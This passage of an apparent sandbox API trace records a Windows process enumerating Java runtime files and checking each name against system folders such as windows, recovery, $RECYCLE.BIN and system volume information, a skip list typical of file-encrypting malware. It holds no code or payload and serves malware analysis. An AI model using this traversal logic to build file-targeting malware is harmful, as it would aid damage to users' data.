hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.730] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39440, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="npjp2.dll", cAlternateFileName="")) returned 1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2=".") returned 1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="..") returned 1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="...") returned 1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="windows") returned -1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="recovery") returned -1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="perflogs") returned -1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="documents and settings") returned 1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="system volume information") returned -1 [0069.730] lstrcmpiW (lpString1="npjp2.dll", lpString2="msocache") returned 1 [0069.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npjp2.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npjp2.dll", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="npjp2.dll", lpUsedDefaultChar=0x0) returned 9 [0069.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npjp2.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npjp2.dll", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="npjp2.dll", lpUsedDefaultChar=0x0) returned 9 [0069.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0069.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0069.731] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39440, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="npjp2.dll", cAlternateFileName="")) returned 0 [0069.731] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0069.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0069.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.731] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2=".") returned 1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="..") returned 1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="...") returned 1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="windows") returned -1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="recovery") returned -1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="perflogs") returned 1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="documents and settings") returned 1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="system volume information") returned -1 [0069.731] lstrcmpiW (lpString1="policytool.exe", lpString2="msocache") returned 1 [0069.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="policytool.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="policytool.exe", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="policytool.exe", lpUsedDefaultChar=0x0) returned 14 [0069.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="policytool.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="policytool.exe", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="policytool.exe", lpUsedDefaultChar=0x0) returned 14 [0069.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0069.732] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="prism_common.dll", cAlternateFileName="PRISM_~1.DLL")) returned 1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2=".") returned 1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="..") returned 1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="...") returned 1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="windows") returned -1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="recovery") returned -1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="perflogs") returned 1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="documents and settings") returned 1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="system volume information") returned -1 [0069.740] lstrcmpiW (lpString1="prism_common.dll", lpString2="msocache") returned 1 [0069.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_common.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0069.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_common.dll", cchWideChar=16, lpMultiByteStr=0x2411f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prism_common.dll", lpUsedDefaultChar=0x0) returned 16 [0069.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_common.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_common.dll", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prism_common.dll", lpUsedDefaultChar=0x0) returned 16 [0069.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0069.741] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1fe40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="prism_d3d.dll", cAlternateFileName="PRISM_~2.DLL")) returned 1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2=".") returned 1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="..") returned 1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="...") returned 1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="windows") returned -1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="recovery") returned -1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="perflogs") returned 1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="documents and settings") returned 1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="system volume information") returned -1 [0069.741] lstrcmpiW (lpString1="prism_d3d.dll", lpString2="msocache") returned 1 [0069.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_d3d.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_d3d.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prism_d3d.dll", lpUsedDefaultChar=0x0) returned 13 [0069.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_d3d.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_d3d.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prism_d3d.dll", lpUsedDefaultChar=0x0) returned 13 [0069.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.741] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="prism_sw.dll", cAlternateFileName="")) returned 1 [0069.741] lstrcmpiW (lpString1="prism_sw.dll", lpString2=".") returned 1 [0069.741] lstrcmpiW (lpString1="prism_sw.dll", lpString2="..") returned 1 [0069.741] lstrcmpiW (lpString1="prism_sw.dll", lpString2="...") returned 1 [0069.741] lstrcmpiW (lpString1="prism_sw.dll", lpString2="windows") returned -1 [0069.741] lstrcmpiW (lpString1="prism_sw.dll", lpString2="recovery") returned -1 [0069.742] lstrcmpiW (lpString1="prism_sw.dll", lpString2="perflogs") returned 1 [0069.742] lstrcmpiW (lpString1="prism_sw.dll", lpString2="documents and settings") returned 1 [0069.742] lstrcmpiW (lpString1="prism_sw.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.742] lstrcmpiW (lpString1="prism_sw.dll", lpString2="system volume information") returned -1 [0069.742] lstrcmpiW (lpString1="prism_sw.dll", lpString2="msocache") returned 1 [0069.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_sw.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_sw.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prism_sw.dll", lpUsedDefaultChar=0x0) returned 12 [0069.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_sw.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prism_sw.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prism_sw.dll", lpUsedDefaultChar=0x0) returned 12 [0069.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.742] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="resource.dll", cAlternateFileName="")) returned 1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2=".") returned 1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="..") returned 1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="...") returned 1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="windows") returned -1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="recovery") returned 1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="perflogs") returned 1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="documents and settings") returned 1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="system volume information") returned -1 [0069.742] lstrcmpiW (lpString1="resource.dll", lpString2="msocache") returned 1 [0069.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resource.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resource.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="resource.dll", lpUsedDefaultChar=0x0) returned 12 [0069.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resource.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resource.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="resource.dll", lpUsedDefaultChar=0x0) returned 12 [0069.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.743] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="rmid.exe", cAlternateFileName="")) returned 1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2=".") returned 1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="..") returned 1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="...") returned 1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="windows") returned -1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="recovery") returned 1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="perflogs") returned 1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="documents and settings") returned 1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="system volume information") returned -1 [0069.743] lstrcmpiW (lpString1="rmid.exe", lpString2="msocache") returned 1 [0069.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmid.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmid.exe", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rmid.exe", lpUsedDefaultChar=0x0) returned 8 [0069.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0069.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmid.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmid.exe", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rmid.exe", lpUsedDefaultChar=0x0) returned 8 [0069.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0069.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.743] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8af971e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="rmiregistry.exe", cAlternateFileName="RMIREG~1.EXE")) returned 1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2=".") returned 1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="..") returned 1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="...") returned 1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="windows") returned -1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="recovery") returned 1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="perflogs") returned 1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="documents and settings") returned 1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.743] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="system volume information") returned -1 [0069.744] lstrcmpiW (lpString1="rmiregistry.exe", lpString2="msocache") returned 1 [0069.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0069.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmiregistry.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmiregistry.exe", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rmiregistry.exe", lpUsedDefaultChar=0x0) returned 15 [0069.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0069.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmiregistry.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmiregistry.exe", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rmiregistry.exe", lpUsedDefaultChar=0x0) returned 15 [0069.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.744] FindNextFileW (in: hFindFile=0x231c00, 